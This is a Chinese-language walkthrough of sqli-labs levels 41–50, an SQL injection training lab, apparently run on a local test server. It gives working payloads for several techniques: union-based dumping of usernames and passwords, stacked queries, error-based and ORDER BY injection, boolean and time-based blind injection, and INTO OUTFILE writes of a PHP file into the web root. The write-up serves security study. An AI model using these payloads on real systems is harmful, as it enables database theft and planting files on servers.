第四十一关
这关和第三十九关一样,只是错误没有回显
获得版本和数据库名 ?id=0 union select 1,version(),database() %23
获得表名 ?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
获得列名 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23
获取用户名密码 ?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
也是可以堆叠注入的,堆叠注入语句 ?id=1;create table test41 like users;%23
第四十二关
熟悉的界面
本来想注册,但是好像不能
我们来看看源码 我们看见login的页面未对 password进行任何的过滤
这一关因为user设置了过滤函数mysqli_real_escape_string()
所以我们在密码处构造
login_user=1&login_password=giao';create table less42 like users#&mysubmit=Login
输入后会显示错误,但是我们的数据库中还是有的
看看数据库,发现我们已经创建进去了
第四十三关
这关和四十二很像,就加个括号就可以啦
login_user=1&login_password=giao');create table less43 like users#&mysubmit=Login
虽然还是显示失败
但是数据库有了
第四十四关
和第四十二关一样,只不过没有回显信息
login_user=1&login_password=giao';create table less44 like users#&mysubmit=Login
查看数据库
第四十五关
和第四十三关一样,区别是没有回显
login_user=1&login_password=giao');create table less45 like users#&mysubmit=Login
查看数据库
第四十六关
到了order by注入 来看看哈,和之前的不一样啦,之前都是id,现在变成sort了,
?sort=1试一下,一下子用户名密码全出了了,
既然要用order by语句进行注入,那首先我们通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入
为什么说他是order by注入 因为在源代码中是这样的 $sql = "SELECT * FROM users ORDER BY $id";
http://192.168.43.117/sqli-labs-master/Less-46/?sort=1+asc (正序)
http://192.168.43.117/sqli-labs-master/Less-46/?sort=1+desc (倒序)
首先想想我们应该怎样注入 ,我们来获取一下,版本数据库名啥的
order by 后的数字可以作为一个注入点。也就是构造order by 后的一个语句,让该语句执行结果为一个数,我们尝试
没有报错,right换成left都一样,说明数字没有起作用,我们考虑布尔类型。此时我们可以用报错注入和延时注入
?sort=right(version(),1) ?sort=left(version(),1) 效果是一样的
此处可以直接构造 ?sort= 后面的一个参数。此时,我们可以有三种形式,
①直接添加注入语句,?sort=(select ******)
②利用一些函数。例如rand()函数等。?sort=rand(sql语句)
Ps:此处我们可以展示一下rand(ture)和rand(false)的结果是不一样的。所以我们用rand来检查我们后面输入的是否对
③利用and,例如?sort=1 and (加sql语句)。
同时,sql语句可以利用报错注入和延时注入的方式,语句我们可以很灵活的构造。
报错注入
获取数据库名 ?sort=1 and(updatexml(1,concat(0x7e,(select database())),0))
获取数据库的权限
?sort=(select count(*) from information_schema.columns group by concat(0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))
布尔盲注
盲注获取数据库第一个字的ascii码(其他的不再演示了)
正则表达式注入 ?sort=1 ^(select(select version()) regexp '^5')发现版本
时间盲注
测试能不能时间注入?sort=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(5)))test))
发现数据库的第一关字母?sort=1 and If(ascii(substr(database(),1,1))=116,0,sleep(3))
发现这关还可以outfile进行写
?sort=1 into outfile 'C:\\phpStudy\\WWW\\sqli-labs-master\\Less-46\\giao.php'
发现已经有了文件夹下已经有了
语句是将密码写入到,giao.php文件中,去看下
第四十七关
和上一关一样,加个单引号就可以啦
获取数据库使用权限
?sort=1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+
获得数据库版本
?sort=1'and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+
也可以程序分析参数后注入
?sort=1'procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+
也可以,时间盲注 ?sort=1' and If(ascii(substr(database(),1,1))=116,0,sleep(3))--+
第四十八关
这关是盲注 order by 数字型盲注
布尔盲注 ?sort=rand(ascii(left(database(),1))=178)
也可以时间盲注 ?sort=1 and If(ascii(substr(database(),1,1))=116,0,sleep(3))--+
第四十九关
这关是盲注 order by 字符型盲注,和四十六关一样,只不过没有错误回显
还可以在四十八关的基础上加上引号就行
?sort=1' and If(ascii(substr(database(),1,1))=116,0,sleep(3))--+
这关也可以outfile进行写
?sort=1' into outfile 'C:\\phpstudy\\WWW\\sqli-labs-master\\Less-49\\giao.php' lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+
查看下
第五十关
这关我们就用堆叠注入 ?sort=1;create table test50 like users;%23
去数据库看看
结束